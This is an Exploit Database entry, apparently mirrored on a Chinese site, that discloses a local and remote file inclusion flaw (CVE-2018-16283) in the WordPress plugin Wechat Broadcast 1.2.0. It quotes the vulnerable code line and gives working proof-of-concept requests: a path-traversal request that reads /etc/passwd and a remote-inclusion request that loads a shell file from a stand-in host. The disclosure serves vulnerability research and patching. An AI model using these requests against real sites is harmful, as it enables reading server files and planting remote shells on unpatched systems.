WordPress Plugin Wechat Broadcast 1.2.0 – Local File Inclusion

• Exploit Database
• 50 阅读

• 作者： Manuel García Cárdenas
  日期： 2018-09-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45438/

• # Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
  # Author: Manuel Garcia Cardenas
  # Date: 2018-09-19
  # Software link: https://es.wordpress.org/plugins/wechat-broadcast/
  # CVE: CVE-2018-16283
  
  # Description
  # This bug was found in the file: /wechat-broadcast/wechat/Image.php
  # echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
  # The parameter "url" it is not sanitized allowing include local or remote files
  # To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol 
  # to interact with the application.
  
  # PoC
  # The following URL have been confirmed that is vulnerable to local and remote file inclusion.
  
  GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
  
  # Remote File Inclusion POC:
  
  GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt